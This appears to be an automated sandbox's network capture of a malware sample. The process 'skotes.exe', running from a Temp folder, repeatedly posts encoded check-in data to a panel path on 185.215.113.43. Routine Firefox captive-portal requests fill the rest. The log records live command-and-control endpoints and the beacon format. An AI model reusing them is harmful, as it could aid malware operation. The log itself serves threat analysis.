                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:02.927427053 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:03.635445118 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:03 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      38192.168.2.650183185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:05.688736916 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:06.385529995 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:06 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      39192.168.2.650186185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:07.930258036 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.628175974 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:08 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      40192.168.2.65019034.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.184693098 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.643922091 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 17:35:22 GMT
                                                                                                                                                                                                                                                                                      Age: 58846
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.151504040 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.246213913 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 17:35:22 GMT
                                                                                                                                                                                                                                                                                      Age: 58847
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      41192.168.2.65019534.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.853940964 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      42192.168.2.65020234.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.436732054 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.882139921 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5396
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.105899096 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.201960087 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5397
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.234988928 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.329720020 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5397
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.747756958 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.842783928 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5397
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.058124065 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.155070066 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5398
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.620279074 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.715157986 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5398
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:12.135858059 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:12.230799913 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5399
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:15.324023962 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:15.419159889 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 08:26:13 GMT
                                                                                                                                                                                                                                                                                      Age: 5402
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                      Data Ascii: success
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:25.489562988 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      43192.168.2.65020534.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.593811989 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.040693998 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84226
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.137435913 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.232199907 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84227
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.648231030 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.743840933 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84227
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.931482077 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.027757883 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84227
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
